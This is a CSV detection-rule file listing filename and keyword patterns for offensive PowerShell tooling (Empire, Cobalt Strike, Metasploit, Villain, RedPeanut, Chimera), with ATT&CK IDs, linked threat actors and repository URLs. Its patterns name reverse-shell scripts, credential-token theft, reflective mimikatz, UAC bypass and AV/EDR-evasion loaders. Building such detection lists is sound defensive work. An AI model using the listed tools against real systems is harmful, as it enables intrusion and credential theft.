"*powershell_credentials_tokens*",".{0,1000}powershell_credentials_tokens.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55253"
"*powershell_encode_oneliner*",".{0,1000}powershell_encode_oneliner.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","55254"
"*powershell_encode_oneliner*",".{0,1000}powershell_encode_oneliner.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55255"
"*powershell_encode_stager*",".{0,1000}powershell_encode_stager.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","55256"
"*powershell_encode_stager*",".{0,1000}powershell_encode_stager.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55257"
"*powershell_management_psinject*",".{0,1000}powershell_management_psinject.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55258"
"*powershell_management_spawn*",".{0,1000}powershell_management_spawn.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55259"
"*PowerShell_PoC.zip*",".{0,1000}PowerShell_PoC\.zip.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1134 - T1087.001 - T1123 - T1547.001 - T1547.005 - T1059.001 - T1543.003 - T1555.004 - T1005 - T1482 - T1574.001 - T1574.007 - T1574.008 - T1574.009 - T1056.001 - T1027.005 - T1027.010 - T1003.001 - T1057 - T1055.001 - T1012 - T1620 - T1053.005 - T1113 - T1558.003 - T1552.002 - T1552.006 - T1047","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","Dispossessor - MAZE - Conti - PYSA - Avaddon - Black Basta - APT33 - Earth Lusca - APT41 - MuddyWater - FIN7 - menuPass - Leviathan - TA505 - Patchwork - FIN13 - WIZARD SPIDER - INDRIK SPIDER - PowerPool - APT32 - QUILTED TIGER - COZY BEAR - Turla","Framework","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","N/A","10","10","12274","4660","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z","55260"
"*powershell_privesc_bypassuac_eventvwr*",".{0,1000}powershell_privesc_bypassuac_eventvwr.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55261"
"*powershell_privesc_sherlock*",".{0,1000}powershell_privesc_sherlock.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","55262"
"*powershell_reflective_mimikatz*",".{0,1000}powershell_reflective_mimikatz.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tool","https://github.com/cobbr/SharpSploit","1","0","N/A","N/A","10","10","1789","312","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z","55263"
"*powershell_reverse_shell.ps1*",".{0,1000}powershell_reverse_shell\.ps1.{0,1000}","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","1","N/A","N/A","10","10","1493","252","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z","55264"
"*powershell_reverse_tcp.*",".{0,1000}powershell_reverse_tcp\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","55265"
"*powershell_reverse_tcp.py*",".{0,1000}powershell_reverse_tcp\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","55266"
"*powershell_reverse_tcp_v2.py*",".{0,1000}powershell_reverse_tcp_v2\.py.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021  -  T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","#linux","N/A","10","10","3992","642","2025-01-19T18:37:12Z","2022-10-25T22:02:59Z","55267"
"*powershell_to_vbs,APC_Injection,RemoteThreadContext,RemoteThreadSuspended*",".{0,1000}powershell_to_vbs,APC_Injection,RemoteThreadContext,RemoteThreadSuspended.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","55268"
"*powershell_to_vbs.ps1*",".{0,1000}powershell_to_vbs\.ps1.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","1","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","55269"
"*powershell-admin-download-execute.ino*",".{0,1000}powershell\-admin\-download\-execute\.ino.{0,1000}","offensive_tool_keyword","Pateensy","payload for teensy like a rubber ducky but the syntax is different. this Human interfaes device ( HID attacks ). Penetration With Teensy","T1056.001 - T1200 - T1036 - T1071","TA0002 - TA0005 - TA0011 - TA0006","N/A","N/A","Exploitation tool","https://github.com/screetsec/Pateensy","1","1","N/A","N/A","N/A","2","143","60","2017-01-26T12:02:56Z","2016-03-21T07:29:38Z","55270"
"*PowershellAgentGenerator.*",".{0,1000}PowershellAgentGenerator\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","55271"
"*PowershellAmsiGenerator*",".{0,1000}PowershellAmsiGenerator.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","55272"
"*PowerShellArsenal*",".{0,1000}PowerShellArsenal.{0,1000}","offensive_tool_keyword","PowerShellArsenal","PowerShellArsenal is a PowerShell module used to aid a reverse engineer. The module can be used to disassemble managed and unmanaged code. perform .NET malware analysis. analyze/scrape memory. parse file formats and memory structures. obtain internal system information. etc.","T1057 - T1053 - T1050 - T1564 - T1083 - T1003","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tool","https://github.com/mattifestation/PowerShellArsenal","1","1","N/A","N/A","N/A","9","870","203","2021-08-20T08:41:50Z","2014-11-16T15:20:17Z","55273"
"*PowerShellArtifactGenerator.py*",".{0,1000}PowerShellArtifactGenerator\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","55274"
"*PowershellCradleGenerator.*",".{0,1000}PowershellCradleGenerator\..{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","55275"
"*PowerShellEmpire*",".{0,1000}PowerShellEmpire.{0,1000}","offensive_tool_keyword","empire","PowerShell offers a multitude of offensive advantages. including full .NET access. application whitelisting. direct access to the Win32 API. the ability to assemble malicious binaries in memory. and a default installation on Windows 7+. Offensive PowerShell had a watershed year in 2014. but despite the multitude of useful projects. many pentesters still struggle to integrate PowerShell into their engagements in a secure manner.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://www.powershellempire.com/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55276"
"*PowerShellExecuter.cs*",".{0,1000}PowerShellExecuter\.cs.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","55277"
"*powershell-import *.ps1*",".{0,1000}powershell\-import\s.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","55278"
"*powershell-import /var/www/ps/*.ps1*",".{0,1000}powershell\-import\s\/var\/www\/ps\/.{0,1000}\.ps1.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","55279"
